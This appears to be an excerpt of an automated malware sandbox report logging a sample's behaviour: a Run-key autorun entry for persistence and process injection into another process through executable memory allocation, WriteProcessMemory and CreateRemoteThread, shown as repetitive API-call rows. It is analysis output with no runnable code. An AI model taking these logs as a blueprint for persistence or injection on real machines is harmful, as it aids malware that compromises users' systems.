NtAllocateVirtualMemory Aug. 20, 2021, 9:13 a.m.	process_identifier: 1312 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00550000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x0000019c	1

Installs itself for autorun at Windows startup (1 event)

reg_key

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\Dhfjtcf

reg_value

C:\Users\Public\Libraries\fctjfhD.url

Creates a thread using CreateRemoteThread in a non-child process indicative of process injection (50 out of 287 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 1280 created a remote thread in non-child process 1312
CreateRemoteThread Aug. 20, 2021, 9:13 a.m.	thread_identifier: 2156 process_identifier: 1312 function_address: 0x000c0000 flags: 0 stack_size: 0 parameter: 0x00000000 process_handle: 0x0000019c	1	1368	0
CreateRemoteThread Aug. 20, 2021, 9:13 a.m.	thread_identifier: 2176 process_identifier: 1312 function_address: 0x00100000 flags: 0 stack_size: 0 parameter: 0x000f0000 process_handle: 0x0000019c	1	1368	0
CreateRemoteThread Aug. 20, 2021, 9:13 a.m.	thread_identifier: 808 process_identifier: 1312 function_address: 0x00120000 flags: 0 stack_size: 0 parameter: 0x00110000 process_handle: 0x0000019c	1	408	0
CreateRemoteThread Aug. 20, 2021, 9:13 a.m.	thread_identifier: 1168 process_identifier: 1312 function_address: 0x00160000 flags: 0 stack_size: 0 parameter: 0x00150000 process_handle: 0x0000019c	1	1372	0
CreateRemoteThread Aug. 20, 2021, 9:13 a.m.	thread_identifier: 2200 process_identifier: 1312 function_address: 0x001a0000 flags: 0 stack_size: 0 parameter: 0x00190000 process_handle: 0x0000019c	1	1376	0
CreateRemoteThread Aug. 20, 2021, 9:13 a.m.	thread_identifier: 2308 process_identifier: 1312 function_address: 0x00290000 flags: 0 stack_size: 0 parameter: 0x00280000 process_handle: 0x0000019c	1	1384	0
CreateRemoteThread Aug. 20, 2021, 9:13 a.m.	thread_identifier: 2252 process_identifier: 1312 function_address: 0x002d0000 flags: 0 stack_size: 0 parameter: 0x002c0000 process_handle: 0x0000019c	1	1380	0
CreateRemoteThread Aug. 20, 2021, 9:13 a.m.	thread_identifier: 2168 process_identifier: 1312 function_address: 0x00310000 flags: 0 stack_size: 0 parameter: 0x00300000 process_handle: 0x0000019c	1	1388	0
CreateRemoteThread Aug. 20, 2021, 9:13 a.m.	thread_identifier: 2428 process_identifier: 1312 function_address: 0x00450000 flags: 0 stack_size: 0 parameter: 0x00340000 process_handle: 0x0000019c	1	1392	0
CreateRemoteThread Aug. 20, 2021, 9:13 a.m.	thread_identifier: 2256 process_identifier: 1312 function_address: 0x00490000 flags: 0 stack_size: 0 parameter: 0x00480000 process_handle: 0x0000019c	1	1396	0
CreateRemoteThread Aug. 20, 2021, 9:13 a.m.	thread_identifier: 2312 process_identifier: 1312 function_address: 0x004d0000 flags: 0 stack_size: 0 parameter: 0x004c0000 process_handle: 0x0000019c	1	1400	0
CreateRemoteThread Aug. 20, 2021, 9:13 a.m.	thread_identifier: 2532 process_identifier: 1312 function_address: 0x00510000 flags: 0 stack_size: 0 parameter: 0x00500000 process_handle: 0x0000019c	1	1404	0
CreateRemoteThread Aug. 20, 2021, 9:13 a.m.	thread_identifier: 2324 process_identifier: 1312 function_address: 0x00550000 flags: 0 stack_size: 0 parameter: 0x00540000 process_handle: 0x0000019c	1	1408	0
CreateRemoteThread Aug. 20, 2021, 9:13 a.m.	thread_identifier: 2320 process_identifier: 1312 function_address: 0x00590000 flags: 0 stack_size: 0 parameter: 0x00580000 process_handle: 0x0000019c	1	1412	0
CreateRemoteThread Aug. 20, 2021, 9:13 a.m.	thread_identifier: 2316 process_identifier: 1312 function_address: 0x005d0000 flags: 0 stack_size: 0 parameter: 0x005c0000 process_handle: 0x0000019c	1	1416	0
CreateRemoteThread Aug. 20, 2021, 9:13 a.m.	thread_identifier: 2544 process_identifier: 1312 function_address: 0x00610000 flags: 0 stack_size: 0 parameter: 0x00600000 process_handle: 0x0000019c	1	1420	0
CreateRemoteThread Aug. 20, 2021, 9:13 a.m.	thread_identifier: 2332 process_identifier: 1312 function_address: 0x00650000 flags: 0 stack_size: 0 parameter: 0x00640000 process_handle: 0x0000019c	1	1424	0
CreateRemoteThread Aug. 20, 2021, 9:13 a.m.	thread_identifier: 1792 process_identifier: 1312 function_address: 0x00690000 flags: 0 stack_size: 0 parameter: 0x00680000 process_handle: 0x0000019c	1	1428	0
CreateRemoteThread Aug. 20, 2021, 9:13 a.m.	thread_identifier: 508 process_identifier: 1312 function_address: 0x00750000 flags: 0 stack_size: 0 parameter: 0x00740000 process_handle: 0x0000019c	1	1432	0
CreateRemoteThread Aug. 20, 2021, 9:13 a.m.	thread_identifier: 276 process_identifier: 1312 function_address: 0x00790000 flags: 0 stack_size: 0 parameter: 0x00780000 process_handle: 0x0000019c	1	1436	0
CreateRemoteThread Aug. 20, 2021, 9:13 a.m.	thread_identifier: 2540 process_identifier: 1312 function_address: 0x007d0000 flags: 0 stack_size: 0 parameter: 0x007c0000 process_handle: 0x0000019c	1	1440	0
CreateRemoteThread Aug. 20, 2021, 9:13 a.m.	thread_identifier: 236 process_identifier: 1312 function_address: 0x00810000 flags: 0 stack_size: 0 parameter: 0x00800000 process_handle: 0x0000019c	1	1444	0
CreateRemoteThread Aug. 20, 2021, 9:13 a.m.	thread_identifier: 456 process_identifier: 1312 function_address: 0x00850000 flags: 0 stack_size: 0 parameter: 0x00840000 process_handle: 0x0000019c	1	1448	0
CreateRemoteThread Aug. 20, 2021, 9:13 a.m.	thread_identifier: 532 process_identifier: 1312 function_address: 0x00890000 flags: 0 stack_size: 0 parameter: 0x00880000 process_handle: 0x0000019c	1	1452	0
CreateRemoteThread Aug. 20, 2021, 9:13 a.m.	thread_identifier: 776 process_identifier: 1312 function_address: 0x008d0000 flags: 0 stack_size: 0 parameter: 0x008c0000 process_handle: 0x0000019c	1	1456	0
CreateRemoteThread Aug. 20, 2021, 9:13 a.m.	thread_identifier: 2512 process_identifier: 1312 function_address: 0x00910000 flags: 0 stack_size: 0 parameter: 0x00900000 process_handle: 0x0000019c	1	1460	0
CreateRemoteThread Aug. 20, 2021, 9:13 a.m.	thread_identifier: 2812 process_identifier: 1312 function_address: 0x00950000 flags: 0 stack_size: 0 parameter: 0x00940000 process_handle: 0x0000019c	1	1464	0
CreateRemoteThread Aug. 20, 2021, 9:13 a.m.	thread_identifier: 2412 process_identifier: 1312 function_address: 0x00a90000 flags: 0 stack_size: 0 parameter: 0x00a80000 process_handle: 0x0000019c	1	1468	0
CreateRemoteThread Aug. 20, 2021, 9:13 a.m.	thread_identifier: 2264 process_identifier: 1312 function_address: 0x00ad0000 flags: 0 stack_size: 0 parameter: 0x00ac0000 process_handle: 0x0000019c	1	1472	0
CreateRemoteThread Aug. 20, 2021, 9:13 a.m.	thread_identifier: 2408 process_identifier: 1312 function_address: 0x00b10000 flags: 0 stack_size: 0 parameter: 0x00b00000 process_handle: 0x0000019c	1	1476	0
CreateRemoteThread Aug. 20, 2021, 9:13 a.m.	thread_identifier: 1784 process_identifier: 1312 function_address: 0x00b50000 flags: 0 stack_size: 0 parameter: 0x00b40000 process_handle: 0x0000019c	1	1480	0
CreateRemoteThread Aug. 20, 2021, 9:13 a.m.	thread_identifier: 1624 process_identifier: 1312 function_address: 0x00b90000 flags: 0 stack_size: 0 parameter: 0x00b80000 process_handle: 0x0000019c	1	1484	0
CreateRemoteThread Aug. 20, 2021, 9:13 a.m.	thread_identifier: 1904 process_identifier: 1312 function_address: 0x00be0000 flags: 0 stack_size: 0 parameter: 0x00bd0000 process_handle: 0x0000019c	1	1488	0
CreateRemoteThread Aug. 20, 2021, 9:13 a.m.	thread_identifier: 2212 process_identifier: 1312 function_address: 0x00c20000 flags: 0 stack_size: 0 parameter: 0x00c10000 process_handle: 0x0000019c	1	1492	0
CreateRemoteThread Aug. 20, 2021, 9:13 a.m.	thread_identifier: 1776 process_identifier: 1312 function_address: 0x00c60000 flags: 0 stack_size: 0 parameter: 0x00c50000 process_handle: 0x0000019c	1	1496	0
CreateRemoteThread Aug. 20, 2021, 9:13 a.m.	thread_identifier: 2760 process_identifier: 1312 function_address: 0x00ca0000 flags: 0 stack_size: 0 parameter: 0x00c90000 process_handle: 0x0000019c	1	1500	0
CreateRemoteThread Aug. 20, 2021, 9:13 a.m.	thread_identifier: 2240 process_identifier: 1312 function_address: 0x00ce0000 flags: 0 stack_size: 0 parameter: 0x00cd0000 process_handle: 0x0000019c	1	1504	0
CreateRemoteThread Aug. 20, 2021, 9:13 a.m.	thread_identifier: 2396 process_identifier: 1312 function_address: 0x00d20000 flags: 0 stack_size: 0 parameter: 0x00d10000 process_handle: 0x0000019c	1	1508	0
CreateRemoteThread Aug. 20, 2021, 9:13 a.m.	thread_identifier: 2392 process_identifier: 1312 function_address: 0x00d60000 flags: 0 stack_size: 0 parameter: 0x00d50000 process_handle: 0x0000019c	1	1512	0
CreateRemoteThread Aug. 20, 2021, 9:13 a.m.	thread_identifier: 2404 process_identifier: 1312 function_address: 0x00da0000 flags: 0 stack_size: 0 parameter: 0x00d90000 process_handle: 0x0000019c	1	1516	0
CreateRemoteThread Aug. 20, 2021, 9:13 a.m.	thread_identifier: 2400 process_identifier: 1312 function_address: 0x00de0000 flags: 0 stack_size: 0 parameter: 0x00dd0000 process_handle: 0x0000019c	1	1520	0
CreateRemoteThread Aug. 20, 2021, 9:13 a.m.	thread_identifier: 2292 process_identifier: 1312 function_address: 0x00e20000 flags: 0 stack_size: 0 parameter: 0x00e10000 process_handle: 0x0000019c	1	1524	0
CreateRemoteThread Aug. 20, 2021, 9:13 a.m.	thread_identifier: 240 process_identifier: 1312 function_address: 0x00e60000 flags: 0 stack_size: 0 parameter: 0x00e50000 process_handle: 0x0000019c	1	1528	0
CreateRemoteThread Aug. 20, 2021, 9:13 a.m.	thread_identifier: 424 process_identifier: 1312 function_address: 0x00ea0000 flags: 0 stack_size: 0 parameter: 0x00e90000 process_handle: 0x0000019c	1	1532	0
CreateRemoteThread Aug. 20, 2021, 9:13 a.m.	thread_identifier: 2920 process_identifier: 1312 function_address: 0x00ee0000 flags: 0 stack_size: 0 parameter: 0x00ed0000 process_handle: 0x0000019c	1	1536	0
CreateRemoteThread Aug. 20, 2021, 9:13 a.m.	thread_identifier: 2820 process_identifier: 1312 function_address: 0x00f20000 flags: 0 stack_size: 0 parameter: 0x00f10000 process_handle: 0x0000019c	1	1540	0
CreateRemoteThread Aug. 20, 2021, 9:13 a.m.	thread_identifier: 2756 process_identifier: 1312 function_address: 0x00f60000 flags: 0 stack_size: 0 parameter: 0x00f50000 process_handle: 0x0000019c	1	1544	0
CreateRemoteThread Aug. 20, 2021, 9:13 a.m.	thread_identifier: 1788 process_identifier: 1312 function_address: 0x00fa0000 flags: 0 stack_size: 0 parameter: 0x00f90000 process_handle: 0x0000019c	1	1548	0
CreateRemoteThread Aug. 20, 2021, 9:13 a.m.	thread_identifier: 816 process_identifier: 1312 function_address: 0x00fe0000 flags: 0 stack_size: 0 parameter: 0x00fd0000 process_handle: 0x0000019c	1	1552	0

Manipulates memory of a non-child process indicative of process injection (50 out of 1104 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 1280 manipulating memory of non-child process 1312
NtAllocateVirtualMemory Aug. 20, 2021, 9:13 a.m.	process_identifier: 1312 region_size: 495616 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x10410000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x0000019c	1	0	0
NtAllocateVirtualMemory Aug. 20, 2021, 9:13 a.m.	process_identifier: 1312 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000c0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0x0000019c	1	0	0
NtAllocateVirtualMemory Aug. 20, 2021, 9:13 a.m.	process_identifier: 1312 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000d0000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x0000019c	1	0	0
NtAllocateVirtualMemory Aug. 20, 2021, 9:13 a.m.	process_identifier: 1312 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000e0000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x0000019c	1	0	0
NtAllocateVirtualMemory Aug. 20, 2021, 9:13 a.m.	process_identifier: 1312 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000f0000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x0000019c	1	0	0
NtAllocateVirtualMemory Aug. 20, 2021, 9:13 a.m.	process_identifier: 1312 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00100000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x0000019c	1	0	0
NtAllocateVirtualMemory Aug. 20, 2021, 9:13 a.m.	process_identifier: 1312 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00020000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x0000019c	1	0	0
NtAllocateVirtualMemory Aug. 20, 2021, 9:13 a.m.	process_identifier: 1312 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00030000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x0000019c	1	0	0
NtAllocateVirtualMemory Aug. 20, 2021, 9:13 a.m.	process_identifier: 1312 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00110000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x0000019c	1	0	0
NtAllocateVirtualMemory Aug. 20, 2021, 9:13 a.m.	process_identifier: 1312 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00120000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x0000019c	1	0	0
NtAllocateVirtualMemory Aug. 20, 2021, 9:13 a.m.	process_identifier: 1312 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00130000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x0000019c	1	0	0
NtAllocateVirtualMemory Aug. 20, 2021, 9:13 a.m.	process_identifier: 1312 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00140000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x0000019c	1	0	0
NtAllocateVirtualMemory Aug. 20, 2021, 9:13 a.m.	process_identifier: 1312 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00150000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x0000019c	1	0	0
NtAllocateVirtualMemory Aug. 20, 2021, 9:13 a.m.	process_identifier: 1312 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00160000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x0000019c	1	0	0
NtAllocateVirtualMemory Aug. 20, 2021, 9:13 a.m.	process_identifier: 1312 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00170000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x0000019c	1	0	0
NtAllocateVirtualMemory Aug. 20, 2021, 9:13 a.m.	process_identifier: 1312 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00180000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x0000019c	1	0	0
NtAllocateVirtualMemory Aug. 20, 2021, 9:13 a.m.	process_identifier: 1312 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00190000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x0000019c	1	0	0
NtAllocateVirtualMemory Aug. 20, 2021, 9:13 a.m.	process_identifier: 1312 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x001a0000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x0000019c	1	0	0
NtAllocateVirtualMemory Aug. 20, 2021, 9:13 a.m.	process_identifier: 1312 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00260000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x0000019c	1	0	0
NtAllocateVirtualMemory Aug. 20, 2021, 9:13 a.m.	process_identifier: 1312 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00270000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x0000019c	1	0	0
NtAllocateVirtualMemory Aug. 20, 2021, 9:13 a.m.	process_identifier: 1312 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00280000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x0000019c	1	0	0
NtAllocateVirtualMemory Aug. 20, 2021, 9:13 a.m.	process_identifier: 1312 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00290000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x0000019c	1	0	0
NtAllocateVirtualMemory Aug. 20, 2021, 9:13 a.m.	process_identifier: 1312 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x002a0000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x0000019c	1	0	0
NtAllocateVirtualMemory Aug. 20, 2021, 9:13 a.m.	process_identifier: 1312 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x002b0000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x0000019c	1	0	0
NtAllocateVirtualMemory Aug. 20, 2021, 9:13 a.m.	process_identifier: 1312 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x002c0000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x0000019c	1	0	0
NtAllocateVirtualMemory Aug. 20, 2021, 9:13 a.m.	process_identifier: 1312 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x002d0000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x0000019c	1	0	0
NtAllocateVirtualMemory Aug. 20, 2021, 9:13 a.m.	process_identifier: 1312 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x002e0000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x0000019c	1	0	0
NtAllocateVirtualMemory Aug. 20, 2021, 9:13 a.m.	process_identifier: 1312 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x002f0000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x0000019c	1	0	0
NtAllocateVirtualMemory Aug. 20, 2021, 9:13 a.m.	process_identifier: 1312 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00300000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x0000019c	1	0	0
NtAllocateVirtualMemory Aug. 20, 2021, 9:13 a.m.	process_identifier: 1312 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00310000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x0000019c	1	0	0
NtAllocateVirtualMemory Aug. 20, 2021, 9:13 a.m.	process_identifier: 1312 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00320000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x0000019c	1	0	0
NtAllocateVirtualMemory Aug. 20, 2021, 9:13 a.m.	process_identifier: 1312 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00330000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x0000019c	1	0	0
NtAllocateVirtualMemory Aug. 20, 2021, 9:13 a.m.	process_identifier: 1312 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00340000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x0000019c	1	0	0
NtAllocateVirtualMemory Aug. 20, 2021, 9:13 a.m.	process_identifier: 1312 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00450000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x0000019c	1	0	0
NtAllocateVirtualMemory Aug. 20, 2021, 9:13 a.m.	process_identifier: 1312 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00460000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x0000019c	1	0	0
NtAllocateVirtualMemory Aug. 20, 2021, 9:13 a.m.	process_identifier: 1312 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00470000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x0000019c	1	0	0
NtAllocateVirtualMemory Aug. 20, 2021, 9:13 a.m.	process_identifier: 1312 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00480000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x0000019c	1	0	0
NtAllocateVirtualMemory Aug. 20, 2021, 9:13 a.m.	process_identifier: 1312 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00490000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x0000019c	1	0	0
NtAllocateVirtualMemory Aug. 20, 2021, 9:13 a.m.	process_identifier: 1312 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x004a0000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x0000019c	1	0	0
NtAllocateVirtualMemory Aug. 20, 2021, 9:13 a.m.	process_identifier: 1312 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x004b0000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x0000019c	1	0	0
NtAllocateVirtualMemory Aug. 20, 2021, 9:13 a.m.	process_identifier: 1312 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x004c0000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x0000019c	1	0	0
NtAllocateVirtualMemory Aug. 20, 2021, 9:13 a.m.	process_identifier: 1312 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x004d0000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x0000019c	1	0	0
NtAllocateVirtualMemory Aug. 20, 2021, 9:13 a.m.	process_identifier: 1312 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x004e0000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x0000019c	1	0	0
NtAllocateVirtualMemory Aug. 20, 2021, 9:13 a.m.	process_identifier: 1312 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x004f0000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x0000019c	1	0	0
NtAllocateVirtualMemory Aug. 20, 2021, 9:13 a.m.	process_identifier: 1312 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00500000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x0000019c	1	0	0
NtAllocateVirtualMemory Aug. 20, 2021, 9:13 a.m.	process_identifier: 1312 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00510000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x0000019c	1	0	0
NtAllocateVirtualMemory Aug. 20, 2021, 9:13 a.m.	process_identifier: 1312 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00520000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x0000019c	1	0	0
NtAllocateVirtualMemory Aug. 20, 2021, 9:13 a.m.	process_identifier: 1312 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00530000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x0000019c	1	0	0
NtAllocateVirtualMemory Aug. 20, 2021, 9:13 a.m.	process_identifier: 1312 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00540000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x0000019c	1	0	0

Potential code injection by writing to the memory of another process (50 out of 1103 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 1280 injected into non-child 1312
WriteProcessMemory Aug. 20, 2021, 9:13 a.m.	buffer: hÿhÿ×I¤vÕ³wKERNEL32.dllÿ,û[Lú[¾t¦t\|ú[É¦t ý~`ú[la¦tQy¦t ý~\|ú[:¦t6;¬tû[mØ§tÔú[Ôú[ÿÿÿÿ@û[,û[?¸ÿ$¸û[,%¸äú[lþ;Àpþ;û[QA¹YA¹Pû[äE¸ base_address: 0x000c0000 process_identifier: 1312 process_handle: 0x0000019c	1	1	0
WriteProcessMemory Aug. 20, 2021, 9:13 a.m.	buffer: CreateToolhelp32Snapshot base_address: 0x000d0000 process_identifier: 1312 process_handle: 0x0000019c	1	1	0
WriteProcessMemory Aug. 20, 2021, 9:13 a.m.	buffer: KERNEL32.dll base_address: 0x000e0000 process_identifier: 1312 process_handle: 0x0000019c	1	1	0
WriteProcessMemory Aug. 20, 2021, 9:13 a.m.	buffer: Õ³w"¤vE¤v base_address: 0x000f0000 process_identifier: 1312 process_handle: 0x0000019c	1	1	0
